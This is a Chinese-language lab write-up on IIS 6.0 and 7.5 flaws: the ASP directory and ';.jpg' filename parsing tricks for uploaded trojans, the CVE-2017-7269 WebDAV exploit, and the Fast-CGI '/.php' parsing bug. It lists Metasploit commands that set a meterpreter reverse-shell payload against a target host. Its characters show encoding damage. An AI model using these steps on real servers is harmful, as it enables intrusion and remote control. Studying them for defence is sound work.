IIS 漏洞总结
?
?
目錄
IIS介紹
IIS6.0 版本
目錄解析漏洞
文件名解析漏洞
遠(yuǎn)程代碼執(zhí)行漏洞? cve_2017_7269?
漏洞描述
POC 說(shuō)明
漏洞利用
IIS7.5版本
IIS解析漏洞
漏洞原理
實(shí)驗(yàn)環(huán)境搭建
漏洞復(fù)現(xiàn)
IIS介紹
iis是Internet Information Services的縮寫,意為互聯(lián)網(wǎng)信息服務(wù),是由微軟公司提供的基于運(yùn)行Microsoft Windows的互聯(lián)網(wǎng)基本服務(wù)
IIS6.0 版本
目錄解析漏洞
對(duì)于名字為.asp后綴的文件夾,IIS會(huì)將該文件夾內(nèi)部的文件都解析為.asp文件來(lái)執(zhí)行。
即構(gòu)造名字為a.asp的目錄,目錄中的1.txt會(huì)作為asp文件執(zhí)行。
文件名解析漏洞
對(duì)于名字為'a.asp;.jpg'文件,IIS并非以最后一個(gè)后綴名來(lái)判斷格式,故會(huì)將其解析為asp文件并執(zhí)行。
即上傳木馬的后綴名為'.asp;.jpg'就可以被服務(wù)器執(zhí)行。
遠(yuǎn)程代碼執(zhí)行漏洞? cve_2017_7269?
漏洞描述
IIS?6.0默認(rèn)不開(kāi)啟WebDAV,一旦開(kāi)啟了WebDAV支持,安裝了IIS6.0的服務(wù)器將可能受到該漏洞的威脅,遠(yuǎn)程攻擊者通過(guò)以“if:<http://"開(kāi)頭的長(zhǎng)header?PROPFIND請(qǐng)求,執(zhí)行任意代碼。
POC 說(shuō)明
- cve_2017_7269 .rb
- 此文件在我的資源中可以找到,或者私信我,我發(fā)給你!
- 此處給出的該漏洞的exploit,用戶需要結(jié)合Kali?中的Metasploit使用!放到kali路徑為:/usr/share/metasploit-framework/modules/exploits/windows/iis/
漏洞利用
1.打開(kāi)windows 2003 開(kāi)啟WebDAV
2.打開(kāi)kali,將我們的poc文件放到指定位置,利用msf完成本次任務(wù)!
- use expolit/windows/iis/cve_2017_7269
- set payload windows/meterpreter/reverse_tcp
- set rhost? 192.168.31.130
- run
3.由于我的windows server 2003 攻擊過(guò)多,無(wú)法演示,以后會(huì)補(bǔ)上!
?
?
?
IIS7.5版本
IIS解析漏洞
漏洞原理
IIS7/7.5在Fast-CGI運(yùn)行模式下,在某文件路徑下(/x.jpg)后面加上’/.php’,則會(huì)以php文件格式解析該圖片
?
實(shí)驗(yàn)環(huán)境搭建
- Windows sever 2008 IIS7.5
- Php7.3 下載地址:https://windows.php.net/downloads/releases/php-7.3.27-Win32-VC15-x64.zip
?
漏洞復(fù)現(xiàn)
1.首先在網(wǎng)站根目錄下有一個(gè)1.jpg圖片,其內(nèi)容為’<?php phpinfo(); ?>’,我們正常訪問(wèn)它?http://localhost/1.jpg
2.然后我們?cè)L問(wèn) http://localhost/1.jpg/.php?,可以看到以php文件格式解析該圖片,執(zhí)行phpinfo。
?
?
?
?
總結(jié)
- 上一篇: SHELLEXECUTEINFO,She
- 下一篇: 腾讯通 admin.php,基于腾讯通R